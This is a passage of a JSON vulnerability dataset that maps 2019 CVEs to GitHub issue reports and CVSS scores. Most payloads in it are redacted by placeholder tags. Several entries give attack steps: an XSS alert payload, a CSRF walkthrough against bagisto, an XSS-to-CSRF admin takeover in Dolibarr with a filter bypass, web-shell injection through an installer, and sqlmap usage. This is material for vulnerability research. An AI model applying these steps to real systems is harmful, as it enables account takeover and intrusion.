  37553. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  37554. "severity": "LOW",
  37555. "baseScore": 3.3,
  37556. "impactScore": 1.4,
  37557. "exploitabilityScore": 1.8
  37558. },
  37559. {
  37560. "CVE_ID": "CVE-2019-14672",
  37561. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2370",
  37562. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2370",
  37563. "Repo_new": "firefly-iii/firefly-iii",
  37564. "Issue_Created_At": "2019-08-02T20:56:28Z",
  37565. "description": "Stored XSS in liability error.. Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in liability name field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Set a new liability account with name \" APITAG alert(\"XSS in liability error\") APITAG \" , also set APITAG amount of debt\" to NUMBERTAG start date of debt\" to any date, \"interest\" to NUMBERTAG Save it. FILETAG NUMBERTAG Go to PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37566. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37567. "severity": "MEDIUM",
  37568. "baseScore": 5.4,
  37569. "impactScore": 2.7,
  37570. "exploitabilityScore": 2.3
  37571. },
  37572. {
  37573. "CVE_ID": "CVE-2019-14690",
  37574. "Issue_Url_old": "https://github.com/adplug/adplug/issues/85",
  37575. "Issue_Url_new": "https://github.com/adplug/adplug/issues/85",
  37576. "Repo_new": "adplug/adplug",
  37577. "Issue_Created_At": "2019-08-06T09:54:44Z",
  37578. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/bmf.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  37579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37580. "severity": "HIGH",
  37581. "baseScore": 8.8,
  37582. "impactScore": 5.9,
  37583. "exploitabilityScore": 2.8
  37584. },
  37585. {
  37586. "CVE_ID": "CVE-2019-14691",
  37587. "Issue_Url_old": "https://github.com/adplug/adplug/issues/86",
  37588. "Issue_Url_new": "https://github.com/adplug/adplug/issues/86",
  37589. "Repo_new": "adplug/adplug",
  37590. "Issue_Created_At": "2019-08-06T09:55:10Z",
  37591. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/dtm.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  37592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37593. "severity": "HIGH",
  37594. "baseScore": 8.8,
  37595. "impactScore": 5.9,
  37596. "exploitabilityScore": 2.8
  37597. },
  37598. {
  37599. "CVE_ID": "CVE-2019-14692",
  37600. "Issue_Url_old": "https://github.com/adplug/adplug/issues/87",
  37601. "Issue_Url_new": "https://github.com/adplug/adplug/issues/87",
  37602. "Repo_new": "adplug/adplug",
  37603. "Issue_Created_At": "2019-08-06T09:55:15Z",
  37604. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/mkj.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  37605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37606. "severity": "HIGH",
  37607. "baseScore": 8.8,
  37608. "impactScore": 5.9,
  37609. "exploitabilityScore": 2.8
  37610. },
  37611. {
  37612. "CVE_ID": "CVE-2019-14731",
  37613. "Issue_Url_old": "https://github.com/easysoft/zentaopms/issues/35",
  37614. "Issue_Url_new": "https://github.com/easysoft/zentaopms/issues/35",
  37615. "Repo_new": "easysoft/zentaopms",
  37616. "Issue_Created_At": "2019-08-05T14:59:11Z",
  37617. "description": "There is one XSS(stored) vulnerability that can get Cookies from other account. There exists XSS(stored) vulnerability in Rich Text Box. The vulnerability replication process is as follows NUMBERTAG Capture packets when you add picture through Rich Text Bo NUMBERTAG Then, change raw data into ERRORTAG NUMBERTAG After successful saving\uff0cusers' cookies will pop up.",
  37618. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37619. "severity": "MEDIUM",
  37620. "baseScore": 5.4,
  37621. "impactScore": 2.7,
  37622. "exploitabilityScore": 2.3
  37623. },
  37624. {
  37625. "CVE_ID": "CVE-2019-14732",
  37626. "Issue_Url_old": "https://github.com/adplug/adplug/issues/88",
  37627. "Issue_Url_new": "https://github.com/adplug/adplug/issues/88",
  37628. "Repo_new": "adplug/adplug",
  37629. "Issue_Created_At": "2019-08-06T11:11:24Z",
  37630. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/a2m.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37632. "severity": "HIGH",
  37633. "baseScore": 8.8,
  37634. "impactScore": 5.9,
  37635. "exploitabilityScore": 2.8
  37636. },
  37637. {
  37638. "CVE_ID": "CVE-2019-14733",
  37639. "Issue_Url_old": "https://github.com/adplug/adplug/issues/89",
  37640. "Issue_Url_new": "https://github.com/adplug/adplug/issues/89",
  37641. "Repo_new": "adplug/adplug",
  37642. "Issue_Created_At": "2019-08-06T11:58:03Z",
  37643. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/rad.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37645. "severity": "HIGH",
  37646. "baseScore": 8.8,
  37647. "impactScore": 5.9,
  37648. "exploitabilityScore": 2.8
  37649. },
  37650. {
  37651. "CVE_ID": "CVE-2019-14734",
  37652. "Issue_Url_old": "https://github.com/adplug/adplug/issues/90",
  37653. "Issue_Url_new": "https://github.com/adplug/adplug/issues/90",
  37654. "Repo_new": "adplug/adplug",
  37655. "Issue_Created_At": "2019-08-06T12:40:29Z",
  37656. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/mtk.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37658. "severity": "HIGH",
  37659. "baseScore": 8.8,
  37660. "impactScore": 5.9,
  37661. "exploitabilityScore": 2.8
  37662. },
  37663. {
  37664. "CVE_ID": "CVE-2019-14746",
  37665. "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/2",
  37666. "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/2",
  37667. "Repo_new": "poropro/kuaifan",
  37668. "Issue_Created_At": "2019-07-24T08:40:24Z",
  37669. "description": "Insert malicious code in the installation process to get a web shell. PATHTAG NUMBERTAG CODETAG it's easy to find that when we write db's config into FILETAG ,we didn't do any filtering. What's more,we use the APITAG ,so we can control all variables in this page. and this is the payload: FILETAG we can see the caches/config.php FILETAG we visit that page FILETAG",
  37670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37671. "severity": "CRITICAL",
  37672. "baseScore": 9.8,
  37673. "impactScore": 5.9,
  37674. "exploitabilityScore": 3.9
  37675. },
  37676. {
  37677. "CVE_ID": "CVE-2019-14747",
  37678. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/47",
  37679. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/47",
  37680. "Repo_new": "wkeyuan/dwsurvey",
  37681. "Issue_Created_At": "2019-08-07T04:26:10Z",
  37682. "description": "FILETAG FILETAG",
  37683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37684. "severity": "MEDIUM",
  37685. "baseScore": 6.1,
  37686. "impactScore": 2.7,
  37687. "exploitabilityScore": 2.8
  37688. },
  37689. {
  37690. "CVE_ID": "CVE-2019-14809",
  37691. "Issue_Url_old": "https://github.com/golang/go/issues/29098",
  37692. "Issue_Url_new": "https://github.com/golang/go/issues/29098",
  37693. "Repo_new": "golang/go",
  37694. "Issue_Created_At": "2018-12-04T17:21:41Z",
  37695. "description": "Net/URL: APITAG Multiple Parsing Issues. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOOS=windows set PATHTAG set GOPROXY= set GORACE= set GOROOT=C:\\Go set GOTMPDIR= set PATHTAG set GCCGO=gccgo set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG While playing around with APITAG I found a few problems I'd like to share. I'll gladly share more details if anything is unclear or if someone is interested. Normally, APITAG when parsed by APITAG has no APITAG But APITAG has a hostname of APITAG This can be taken further... APITAG has a hostname of APITAG and will pop an alert if relocated to by a browser (after decoding) IP NUMBERTAG support also has it's issues... this URL APITAG has the hostname of APITAG But also do all of these: APITAG APITAG APITAG Even without thinking about how this would interact with other systems and parsers, Just considering code used URL hostname validations and Go's https functions ( APITAG for instance) leveraging APITAG should explain how this could be used maliciously. Again, will be glad to provide more details if needed. All POCs can be found here URLTAG What did you expect to see? Errors for most of it... What did you see instead? Hostnames",
  37696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37697. "severity": "CRITICAL",
  37698. "baseScore": 9.8,
  37699. "impactScore": 5.9,
  37700. "exploitabilityScore": 3.9
  37701. },
  37702. {
  37703. "CVE_ID": "CVE-2019-14859",
  37704. "Issue_Url_old": "https://github.com/warner/python-ecdsa/issues/114",
  37705. "Issue_Url_new": "https://github.com/tlsfuzzer/python-ecdsa/issues/114",
  37706. "Repo_new": "tlsfuzzer/python-ecdsa",
  37707. "Issue_Created_At": "2019-09-25T19:03:04Z",
  37708. "description": "Inconsistent handling of malformed DER signatures. When the DER signature is malformed, the APITAG raises unexpected exceptions and in some cases does not raise any exception. ERRORTAG , ERRORTAG and ERRORTAG are raised in addition to ERRORTAG , at the same time flipping the NUMBERTAG th or NUMBERTAG th least significant bit of NUMBERTAG nd byte of a NIST NUMBERTAG p signature does not cause it to be rejected (the DER encoding is strict, and every value has one defined encoding, any other encoding is invalid and needs to be rejected)",
  37709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  37710. "severity": "CRITICAL",
  37711. "baseScore": 9.1,
  37712. "impactScore": 5.2,
  37713. "exploitabilityScore": 3.9
  37714. },
  37715. {
  37716. "CVE_ID": "CVE-2019-14864",
  37717. "Issue_Url_old": "https://github.com/ansible/ansible/issues/63522",
  37718. "Issue_Url_new": "https://github.com/ansible/ansible/issues/63522",
  37719. "Repo_new": "ansible/ansible",
  37720. "Issue_Created_At": "2019-10-15T19:52:04Z",
  37721. "description": "Sumologic callback plugin logging sensitive data. SUMMARY The sumologic plugin logs sensitive data because no_log is not respected for arguments/vars passed to modules via the APITAG object ISSUE TYPE Bug Report COMPONENT NAME code where ansible_task is defined: URLTAG ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT APITAG NUMBERTAG STEPS TO REPRODUCE Configure a APITAG endpoint and add configuration to ansible.cfg you can find an example of our callback configs above. Below we are using a custom module, but this also happens with every other module we've tested. The module we wrote, inventory_node, has no_log: True specified on the api_key argument. This also happens if no_log: true is passed to any task. yaml name: create node in inventory via inventory_node module delegate_to: localhost connection: local inventory_node: node_name: \"{{ inventory_hostname }}\" internal_ip: \"{{ internal_ip }}\" role_id: \"{{ role_id }}\" datacenter_id: \"{{ datacenter_id }}\" cluster: \"{{ cluster | default(omit) }}\" instance_id: \"{{ instance_id | default(omit) }}\" api_key: \"{{ inventory_api_key }}\" state: present EXPECTED RESULTS I would expect that we not see the api key show up in APITAG ACTUAL RESULTS We see the api key show up in our APITAG logs. Below is the full JSON payload that is sent and received. The APITAG object correctly removes the sensitive field, but APITAG object does not. ERRORTAG",
  37722. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  37723. "severity": "MEDIUM",
  37724. "baseScore": 6.5,
  37725. "impactScore": 3.6,
  37726. "exploitabilityScore": 2.8
  37727. },
  37728. {
  37729. "CVE_ID": "CVE-2019-14892",
  37730. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2462",
  37731. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2462",
  37732. "Repo_new": "fasterxml/jackson-databind",
  37733. "Issue_Created_At": "2019-09-19T06:22:53Z",
  37734. "description": "new gadgets which can cause RCE. Hey, buddy. I notice total NUMBERTAG gadgets can be used to exploit fastjson which can cause RCE. Some of these may works for jackson as well. Please analysis these gadgets. PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
  37735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37736. "severity": "CRITICAL",
  37737. "baseScore": 9.8,
  37738. "impactScore": 5.9,
  37739. "exploitabilityScore": 3.9
  37740. },
  37741. {
  37742. "CVE_ID": "CVE-2019-14893",
  37743. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2469",
  37744. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2469",
  37745. "Repo_new": "fasterxml/jackson-databind",
  37746. "Issue_Created_At": "2019-09-20T06:20:34Z",
  37747. "description": "Block one more gadget type (xalan2). Another gadget ( ) type report regarding a class of xalan . Mitre id: not yet allocated Reporter: MENTIONTAG (via NUMBERTAG originally) ( ) See URLTAG for more on general problem type",
  37748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37749. "severity": "CRITICAL",
  37750. "baseScore": 9.8,
  37751. "impactScore": 5.9,
  37752. "exploitabilityScore": 3.9
  37753. },
  37754. {
  37755. "CVE_ID": "CVE-2019-14924",
  37756. "Issue_Url_old": "https://github.com/swisspol/GCDWebServer/issues/433",
  37757. "Issue_Url_new": "https://github.com/swisspol/gcdwebserver/issues/433",
  37758. "Repo_new": "swisspol/gcdwebserver",
  37759. "Issue_Created_At": "2019-08-07T15:27:55Z",
  37760. "description": "Security issue of APITAG The method APITAG in APITAG class checks the APITAG of APITAG but not the APITAG By taking this error, adversary can make un accessible file to be available, credential of the app for instance. I have found real app affected by this vulnerability.",
  37761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37762. "severity": "HIGH",
  37763. "baseScore": 7.5,
  37764. "impactScore": 3.6,
  37765. "exploitabilityScore": 3.9
  37766. },
  37767. {
  37768. "CVE_ID": "CVE-2019-14933",
  37769. "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/750",
  37770. "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/750",
  37771. "Repo_new": "bagisto/bagisto",
  37772. "Issue_Created_At": "2019-03-27T13:23:39Z",
  37773. "description": "Cross site request forgery . Vulnerable link: URLTAG What is CSRF ? A CSRF attack forces a logged on victims browser to send a forged HTTP request, including the victims session cookie and any other automatically included authentication information, to a vulnerable web application. Vulnerable Page: Admin Panel menu FILETAG Task: To remove items from table without account owner consent. How to detect the vulnerability? It is fairly easy to detect csrf vulnerability via automated tools or code analysis. Here, we will directly look at the href urls of the Delete button which submits value without csrf token using inspect element in the browser. How to reproduce the attack? Step1: Admin (victim) signs into Bagisto admin panel and does not sign off or doesn't close browser. Step2: Admin (victim) opens tab (attacker controlled website with auto load request containing information the attacker wants to delete), details of request sent to bagisto server, auto loads evil script to delete items from the list. Step3: Browser executes evil script on attackers behalf and updates the list. Malicious page containing evil script to edit list NUMBERTAG Delete users on admin panel: No csrf token used on customer delete button. The attacker needs to send a link to page containing below code which will be executed when opened in victims browser. CODETAG NUMBERTAG Deleting review on admin panel: URLTAG NUMBERTAG deleting group: URLTAG NUMBERTAG Locales: URLTAG NUMBERTAG Currencies: URLTAG NUMBERTAG Exchange rates: URLTAG NUMBERTAG Inventory sources: URLTAG NUMBERTAG channels: URLTAG NUMBERTAG Users: URLTAG NUMBERTAG Sliders: URLTAG Impacts of vulnerability: Using this flaw an attacker can remove important functionality of the application which results into denial of most of the services on the store. Prevention Cheat sheet for developers: FILETAG URLTAG",
  37774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37775. "severity": "HIGH",
  37776. "baseScore": 8.8,
  37777. "impactScore": 5.9,
  37778. "exploitabilityScore": 2.8
  37779. },
  37780. {
  37781. "CVE_ID": "CVE-2019-14939",
  37782. "Issue_Url_old": "https://github.com/mysqljs/mysql/issues/2257",
  37783. "Issue_Url_new": "https://github.com/mysqljs/mysql/issues/2257",
  37784. "Repo_new": "mysqljs/mysql",
  37785. "Issue_Created_At": "2019-08-10T14:49:53Z",
  37786. "description": "LOAD DATA LOCAL INFILE option shouldn't be open by default.. impact This may cause arbitrary file read vulnerability. how to do This is my client code: ERRORTAG Use this rogue mysql tool URLTAG on my server. We can just read any file from my computer. FILETAG Although it throws an error, it doesn't matter. how to fix I'm not familiar with source code. But just turn off the LOAD DATA LOCAL INFILE option by default.",
  37787. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  37788. "severity": "MEDIUM",
  37789. "baseScore": 5.5,
  37790. "impactScore": 3.6,
  37791. "exploitabilityScore": 1.8
  37792. },
  37793. {
  37794. "CVE_ID": "CVE-2019-14968",
  37795. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/2",
  37796. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/2",
  37797. "Repo_new": "peacexie/imcat",
  37798. "Issue_Created_At": "2019-08-06T03:03:00Z",
  37799. "description": "the vulnerability report: sql injection vulnerability in FILETAG page . . Exploit vulnerability \uff1a Use sqlmap( URLTAG and use sqlmap tamper : unmagicquotes payload: ERRORTAG FILETAG ERRORTAG GET databases; FILETAG Build install imcat and test vuln: FILETAG FILETAG FILETAG The Vuln src code: FILETAG because php code set database charset=GBK so bypass addslashes or GPC . Safetity up NUMBERTAG mysql database charset UTF NUMBERTAG Checking http input(GET/POST) data fiter dangerous that.",
  37800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37801. "severity": "CRITICAL",
  37802. "baseScore": 9.8,
  37803. "impactScore": 5.9,
  37804. "exploitabilityScore": 3.9
  37805. },
  37806. {
  37807. "CVE_ID": "CVE-2019-14976",
  37808. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/71",
  37809. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/71",
  37810. "Repo_new": "idreamsoft/iCMS",
  37811. "Issue_Created_At": "2019-08-01T20:28:45Z",
  37812. "description": "iCMS NUMBERTAG reflected XSS. FILETAG POC APITAG FILETAG",
  37813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37814. "severity": "MEDIUM",
  37815. "baseScore": 6.1,
  37816. "impactScore": 2.7,
  37817. "exploitabilityScore": 2.8
  37818. },
  37819. {
  37820. "CVE_ID": "CVE-2019-14980",
  37821. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick6/issues/43",
  37822. "Issue_Url_new": "https://github.com/imagemagick/imagemagick6/issues/43",
  37823. "Repo_new": "imagemagick/imagemagick6",
  37824. "Issue_Created_At": "2019-04-22T02:28:38Z",
  37825. "description": "Use after free in magick/blob.c. In magick/blob.c line NUMBERTAG the function APITAG freed the object 'blob_info >data', but it didn't set the pointer to null. The code returned this dangling pointer in line NUMBERTAG it will cause UAF in this code.",
  37826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37827. "severity": "MEDIUM",
  37828. "baseScore": 6.5,
  37829. "impactScore": 3.6,
  37830. "exploitabilityScore": 2.8
  37831. },
  37832. {
  37833. "CVE_ID": "CVE-2019-14981",
  37834. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1552",
  37835. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1552",
  37836. "Repo_new": "imagemagick/imagemagick",
  37837. "Issue_Created_At": "2019-04-18T06:16:56Z",
  37838. "description": "DIVIDE_BY_ZERO in feature.c. APITAG In line NUMBERTAG it assigns 'count NUMBERTAG the code makes a loop as 'for (v=( ((ssize_t) height NUMBERTAG ssize_t) height NUMBERTAG the 'count++' in this loop and the APITAG in line NUMBERTAG But the count is NUMBERTAG in some cases. It may happen DIVIDE_BY_ZERO case if the code doesn't enter this loop.",
  37839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37840. "severity": "MEDIUM",
  37841. "baseScore": 6.5,
  37842. "impactScore": 3.6,
  37843. "exploitabilityScore": 2.8
  37844. },
  37845. {
  37846. "CVE_ID": "CVE-2019-14982",
  37847. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/960",
  37848. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/960",
  37849. "Repo_new": "exiv2/exiv2",
  37850. "Issue_Created_At": "2019-07-15T02:53:48Z",
  37851. "description": "buffer overflow in PATHTAG Describe the bug I found a buffer overflow bugs in PATHTAG due to integer overflow. To Reproduce Steps to reproduce the behaviour: PATHTAG APITAG Expected behavior In APITAG integer overflow occurs when data_size is less than header_size, and it will cause buffer overflow in '&data FILETAG ERRORTAG The poc is here: Just do PATHTAG APITAG FILETAG",
  37852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37853. "severity": "MEDIUM",
  37854. "baseScore": 6.5,
  37855. "impactScore": 3.6,
  37856. "exploitabilityScore": 2.8
  37857. },
  37858. {
  37859. "CVE_ID": "CVE-2019-14993",
  37860. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/7728",
  37861. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/7728",
  37862. "Repo_new": "envoyproxy/envoy",
  37863. "Issue_Created_At": "2019-07-26T00:42:53Z",
  37864. "description": "route regex match fails for large URIs. Title : route regex match fails for large URIs Description : >We've noticed that requests with a very long URI crashes our envoy service for routes defined using a regex matcher. We're not sure if it's due to some overflow bug in Envoy's regex parser, but ideally Envoy should not crash because of a long URI. Repro steps : > Define a route with a match regex like the following: APITAG and then make a request with a large URI: APITAG We've gotten around it by using a prefix matcher instead, but this appears to be a potential APITAG vulnerability if not a security issue.",
  37865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37866. "severity": "HIGH",
  37867. "baseScore": 7.5,
  37868. "impactScore": 3.6,
  37869. "exploitabilityScore": 3.9
  37870. },
  37871. {
  37872. "CVE_ID": "CVE-2019-15052",
  37873. "Issue_Url_old": "https://github.com/gradle/gradle/issues/10278",
  37874. "Issue_Url_new": "https://github.com/gradle/gradle/issues/10278",
  37875. "Repo_new": "gradle/gradle",
  37876. "Issue_Created_At": "2019-08-14T19:06:06Z",
  37877. "description": "DISCUSSION] CVETAG : Repository authentication sent to server of HTTP redirection response. This issue is to discuss [ CVETAG URLTAG and answer any questions that people may have. Our official advisory can be found here: URLTAG Below is the contents of the original vulnerability disclosure reported by MENTIONTAG Expected Behavior If basic authentication is configured for a Maven repository credentials are only sent to the hostname configured. Current Behavior If the Maven repository responds with an HTTP redirection response (e.g. PATHTAG ) to a different hostname Gradle _includes_ the basic authorization header. Some may consider this an information disclosure security issue. Context Some Maven repositories may perform HTTP redirects to serve large binaries from via a CDN; an example of this is Artifactory's Direct Cloud Storage Download URLTAG feature. This Artifactory feature ultimately uses a S3 signed URL as a HTTP redirect. However the S3 request fails because there is authorization in the URL and Gradle sends the _unrelated_ basic authentication header. Steps to Reproduce I have created a full working example of this issue: Clone URLTAG Execute APITAG Build will fail with a APITAG response error The underlaying cause of the NUMBERTAG error is slightly difficult to diagnose because Gradle does not output the text of the response, so I'm including screen shots of the request and responses using a local HTTP proxy. APITAG Request and response to my _fake_ Maven repository: APITAG APITAG Request and response to S3 URL. Note the actual bug is that the header APITAG is being sent to the server APITAG . APITAG APITAG Environment Sample project is configured to use the latest Gradle release NUMBERTAG Please feel free to leave any questions you may have below. Please report any new security vulnerabilities to FILETAG .",
  37878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37879. "severity": "CRITICAL",
  37880. "baseScore": 9.8,
  37881. "impactScore": 5.9,
  37882. "exploitabilityScore": 3.9
  37883. },
  37884. {
  37885. "CVE_ID": "CVE-2019-15058",
  37886. "Issue_Url_old": "https://github.com/nothings/stb/issues/790",
  37887. "Issue_Url_new": "https://github.com/nothings/stb/issues/790",
  37888. "Repo_new": "nothings/stb",
  37889. "Issue_Created_At": "2019-08-13T08:52:36Z",
  37890. "description": "heap buffer overflow in stbi__tga_load with version NUMBERTAG I find heap buffer overflow in stbi__tga_load with latest version NUMBERTAG POC: ERRORTAG In command: APITAG Output: ERRORTAG Analyze this bug: In this poc, when the program call stbi__tga_load: ERRORTAG It will call malloc NUMBERTAG because of specific data finally but after: CODETAG So it will read tga_palette[pal_idx+j] which leads to heap buffer overflow This may lead to the leak of the uninitialized data on the heap and so on......",
  37891. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  37892. "severity": "CRITICAL",
  37893. "baseScore": 9.1,
  37894. "impactScore": 5.2,
  37895. "exploitabilityScore": 3.9
  37896. },
  37897. {
  37898. "CVE_ID": "CVE-2019-15062",
  37899. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/11671",
  37900. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/11671",
  37901. "Repo_new": "dolibarr/dolibarr",
  37902. "Issue_Created_At": "2019-08-09T10:21:02Z",
  37903. "description": "Stored XSS > CSRF > Admin Account Takeover. Bug Hello Team, Dolibar NUMBERTAG alpha suffers from a Stored XSS in the Label field of Link a new file/document in Linked Files of the User. An attacker could use this feature to introduce a CSRF which would completely takeover admin's account. The protection for CSRF is restricted to referrer header and so if a CSRF request is stored inside the application, this feature is bypassed leading to change of account details. Moving to XSS, the various protections do just display an error message when certain keywords forming an XSS payload. This can be easily bypassed by using an object tag with base NUMBERTAG encoding our payload inside it. For to convert the XSS to CSRF, i'm using the iframe tag inside the object tag to load my CSRF request in its src attribute. How to takeover admin account? A request is sent to FILETAG where various details of admin can be changed i.e id NUMBERTAG The attacker just needs the login username of the admin with some random values in firstname and lastname to successfully submit a request. In this request password of admin can be changed, because it doesn't have field to enter previous password for validation. Hence it can be used to submit new password for admin and hence taking over admin account. Environment Version NUMBERTAG alpha OS : Windows NT IN NUMBERTAG L NUMBERTAG build NUMBERTAG APITAG NUMBERTAG AMD NUMBERTAG Web server : APITAG APITAG APITAG PHP NUMBERTAG PHP NUMBERTAG Database : APITAG or APITAG NUMBERTAG APITAG URL(s) : URLTAG > XSS/CSRF FILETAG > CSRF request sent to this URL Expected and actual behavior Expected behaviour: The application should block insertion of tags in pages which would lead to these issues. Actual behaviour: The application doesn't block tags and hence leads to XSS/CSRF Steps to reproduce the behavior NUMBERTAG Login to user account as we will send a request from user to admin, just to show severity of impact. Here i'm logging into user asd and go to user card and click on Linked APITAG Tab FILETAG NUMBERTAG You will see that a user cannot add the Link a new file/document. To bypass this just open inspect element and hover to LINK box. FILETAG NUMBERTAG Now remove the value disabled=\"\" from the tag. The link will now be activated. FILETAG NUMBERTAG Now add the value asdasd.com to URL and APITAG in the Label This is an iframe with source as a csrf file. APITAG is the payload which is base NUMBERTAG encoded. You can add any source like upload it to your server as FILETAG . A new file will be added on behalf of user. FILETAG NUMBERTAG Add the following code as FILETAG ERRORTAG NUMBERTAG Now the attack vector is set. Now only the attacker needs to open the linked files page for the user. Login with admin user and head to all users > asdasd asd. FILETAG As you can see in image FILETAG the admin firstname and lastname is admin admin. Now lets open the user asdasd asd. Head to Users & Groups tab > Click on user asdasd asd APITAG FILETAG Head to Linked files of user. FILETAG If you will see that the iframe is seen on the webpage which executes our CSRF successfully changing the details of admin NUMBERTAG Now open admin profile again. You will see the name has 